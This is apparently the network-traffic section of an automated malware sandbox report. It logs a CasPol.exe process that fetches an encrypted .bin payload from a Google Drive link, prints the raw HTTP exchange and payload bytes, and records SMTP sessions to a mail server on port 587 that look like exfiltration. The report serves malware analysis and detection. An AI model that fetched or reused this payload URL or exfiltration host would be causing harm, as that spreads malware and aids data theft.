                                                                                    May 10, 2022 22:11:05.501169920 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501199961 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501352072 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501359940 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501379013 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501522064 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501548052 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501573086 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501753092 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501775026 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501813889 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501924992 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501949072 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501971960 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502094030 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502125025 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.502161026 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502243996 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.502286911 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.502309084 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502434969 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502458096 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.502491951 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502582073 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.502635956 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.502660990 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502815008 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.502846003 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502976894 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.502995014 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503027916 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.503113985 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503133059 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503153086 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.503300905 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503326893 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.503467083 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.503480911 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503513098 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.503598928 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503619909 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503642082 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.503787994 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503817081 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.503837109 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.503989935 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.503995895 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504002094 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504050970 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504132032 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504141092 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504148960 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504189014 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504194021 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504237890 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504257917 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504261017 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504306078 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504309893 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504354954 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504359007 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504391909 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504452944 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504456997 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504458904 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504502058 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504506111 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504549026 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504550934 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504600048 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504604101 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504606009 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504648924 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504652977 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504657984 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504659891 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504662991 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504698038 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504705906 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504717112 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504789114 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504796028 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504800081 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504802942 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504806995 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504807949 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504844904 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504849911 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504884958 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.504944086 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504950047 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504952908 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.504992962 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.505040884 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.505139112 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.505147934 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:12:42.746068001 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:42.775278091 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:42.775446892 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:46.709001064 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:46.709335089 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:46.738776922 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:46.740099907 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:46.770359039 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:46.770895004 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:46.838279963 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:46.838928938 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:46.868448019 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:46.868910074 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:46.937751055 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:47.071933985 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:47.072268009 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:47.101569891 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:47.101628065 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:47.103828907 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:47.103924036 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:47.103939056 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:47.103949070 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:47.133389950 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:47.133454084 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:47.136641026 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:47.181154013 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:49.771874905 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:49.840651035 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:50.004125118 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:50.004484892 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:50.004597902 CEST49769587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:50.006556988 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:50.034548044 CEST5874976977.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:50.035742044 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:50.035959959 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:50.885008097 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:50.885515928 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:50.915431976 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:50.915954113 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:50.945972919 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:50.946515083 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:50.983189106 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:50.983692884 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.013180971 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.013530016 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.083772898 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.176805019 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.177195072 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.206681967 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.206748962 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.208997965 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.209095955 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.209112883 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.209285975 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.209980011 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.210079908 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.238392115 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.238492966 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.238560915 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.238715887 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.239660025 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.239737988 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.239775896 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.239810944 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.239845991 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.239880085 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.239913940 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.239948034 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.239949942 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.239984035 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.240063906 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:12:51.268640041 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.269397020 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.269459963 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.269491911 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.269521952 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.269825935 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.269870996 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.269937992 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.269969940 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.270104885 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.270210981 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.270452023 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.270529985 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.277113914 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:12:51.320768118 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:14:21.926006079 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:14:21.994291067 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:14:22.157042027 CEST5874977177.246.191.210192.168.11.20
                                                                                    May 10, 2022 22:14:22.157253981 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:14:22.157304049 CEST49771587192.168.11.2077.246.191.210
                                                                                    May 10, 2022 22:14:22.186652899 CEST5874977177.246.191.210192.168.11.20

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    May 10, 2022 22:11:04.292789936 CEST6222953192.168.11.201.1.1.1
                                                                                    May 10, 2022 22:11:04.301464081 CEST53622291.1.1.1192.168.11.20
                                                                                    May 10, 2022 22:11:05.119684935 CEST5300453192.168.11.201.1.1.1
                                                                                    May 10, 2022 22:11:05.158250093 CEST53530041.1.1.1192.168.11.20
                                                                                    May 10, 2022 22:12:41.887094021 CEST5830653192.168.11.201.1.1.1
                                                                                    May 10, 2022 22:12:42.691195011 CEST53583061.1.1.1192.168.11.20

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    May 10, 2022 22:11:04.292789936 CEST192.168.11.201.1.1.10x10dStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                    May 10, 2022 22:11:05.119684935 CEST192.168.11.201.1.1.10x687eStandard query (0)doc-10-70-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                    May 10, 2022 22:12:41.887094021 CEST192.168.11.201.1.1.10xd872Standard query (0)mail.comansi.comA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    May 10, 2022 22:11:04.301464081 CEST1.1.1.1192.168.11.200x10dNo error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)
                                                                                    May 10, 2022 22:11:05.158250093 CEST1.1.1.1192.168.11.200x687eNo error (0)doc-10-70-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                    May 10, 2022 22:11:05.158250093 CEST1.1.1.1192.168.11.200x687eNo error (0)googlehosted.l.googleusercontent.com142.250.185.193A (IP address)IN (0x0001)
                                                                                    May 10, 2022 22:12:42.691195011 CEST1.1.1.1192.168.11.200xd872No error (0)mail.comansi.com77.246.191.210A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • drive.google.com
                                                                                    • doc-10-70-docs.googleusercontent.com

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.11.2049755142.250.181.238443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2022-05-10 20:11:04 UTC0OUTGET /uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    2022-05-10 20:11:05 UTC0INHTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Tue, 10 May 2022 20:11:05 GMT
                                                                                    Location: https://doc-10-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Content-Security-Policy: script-src 'nonce-G9vbFqIRNlzFXmkSpu80lA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.11.2049756142.250.185.193443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2022-05-10 20:11:05 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Host: doc-10-70-docs.googleusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2022-05-10 20:11:05 UTC2INHTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ADPycdufQwbLH89UvCLFSNchITjkBzvEnfcmHj7mQj8nLrEUjraRhL7WA6DE0uD9e5-5YMilF1SsH4v1wT_94UuzbLlI1g
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                    Access-Control-Allow-Methods: GET,OPTIONS
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Disposition: attachment;filename="FED_gLNEU186.bin";filename*=UTF-8''FED_gLNEU186.bin
                                                                                    Content-Length: 221760
                                                                                    Date: Tue, 10 May 2022 20:11:05 GMT
                                                                                    Expires: Tue, 10 May 2022 20:11:05 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=hG0f7g==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close
                                                                                    2022-05-10 20:11:05 UTC5INData Raw: 9a 0d 4e ec 94 d5 91 4f a3 25 c1 97 25 c4 d4 3c cc b0 7d e0 86 f4 1c c9 01 df ff 52 4f a1 80 fd ad ed a1 dc 8c 0d af df d7 04 f3 f2 f0 2e 59 de a9 c0 ec ae 44 24 15 de 24 14 63 bc 22 cd 4d 99 9a 3d 32 a0 46 4f e5 52 c0 2a c0 ff 3c 8e 1e bf 86 8f 24 fd 61 c7 8a 94 29 14 54 13 b1 76 70 a6 2d 56 83 9a 84 9e c8 e1 c1 73 2c 18 89 c8 73 04 8a 54 b8 6f 17 00 da 36 0b 0e 72 01 71 ce f2 dc 07 9c 75 d2 ba 22 5d 18 e4 72 54 d5 7a a3 db 47 34 5d 32 6f 07 4b c1 3d ce 70 6b e1 e0 eb bd bf 72 04 9e d6 fe 04 b6 50 3f ab 00 28 d3 b0 21 33 f7 3c 28 42 80 22 72 cb 05 42 f1 5e 7d e5 19 e8 b4 0f 8f 8a 56 0f d0 c4 c3 95 92 04 2c 0a 4f 89 63 2c 10 6d e9 0f bb 1f 7f 19 8b a0 9d 59 8b c3 57 7c 62 ac c6 11 ff 76 14 e6 9e 45 9c 22 14 6e 9e 97 05 9f f3 5f 4f 62 d9 4d 31 5b a6 4a 53
                                                                                    Data Ascii: NO%%<}RO.YD$$c"M=2FOR*<$a)Tvp-Vs,sTo6rqu"]rTzG4]2oK=pkrP?(!3<(B"rB^}V,Oc,mYW|bvE"n_ObM1[JS
                                                                                    2022-05-10 20:11:05 UTC9INData Raw: 04 51 12 a0 32 14 69 06 88 b3 8e d5 a4 22 0d 36 18 21 e0 0e c5 54 f0 f4 45 15 3e 40 bc f6 6c 92 c8 f0 c0 07 9e da 23 e8 8b 5f ae 07 ba 33 b1 dc 5f 44 83 f8 03 ce 8b 10 df 2d f4 39 c1 2b 1a 60 10 22 3c c6 97 c6 e1 bf f7 a7 84 2f 0a 48 63 eb 77 06 0a 90 ef 70 dd 51 b5 18 e7 12 8a d8 54 17 45 c8 7e 99 dc a9 d1 e2 66 f1 1c e5 4e a5 02 0c 6f e9 3b 47 07 e5 e4 be 7b 35 3f 89 86 fc 77 3e ec 2c 4f 31 28 96 4f 17 44 c4 cf 0c 30 b0 a8 c0 07 57 98 81 c5 37 32 78 48 3a f8 be 29 1a d4 6c 97 b4 c5 cb fd 4b c7 82 bd c5 50 c9 d5 81 ff 6f 16 48 ee e3 1d 6f 9c 4a 8e d0 7b 80 41 33 47 ea f7 7e 3f 09 bf 3b 21 a3 a1 8c 12 d9 d4 17 51 d4 0b cc 91 80 41 8a 6e 14 06 ff 1a ab d8 38 1d 05 8a 7d cb 80 f3 72 f2 0b da 99 7e 99 28 ab 79 06 b0 43 14 09 ef c0 f6 d8 e9 09 bc c9 89 59 91
                                                                                    Data Ascii: Q2i"6!TE>@l#_3_D-9+`"</HcwpQTE~fNo;G{5?w>,O1(OD0W72xH:)lKPoHoJ{A3G~?;!QAn8}r~(yCY
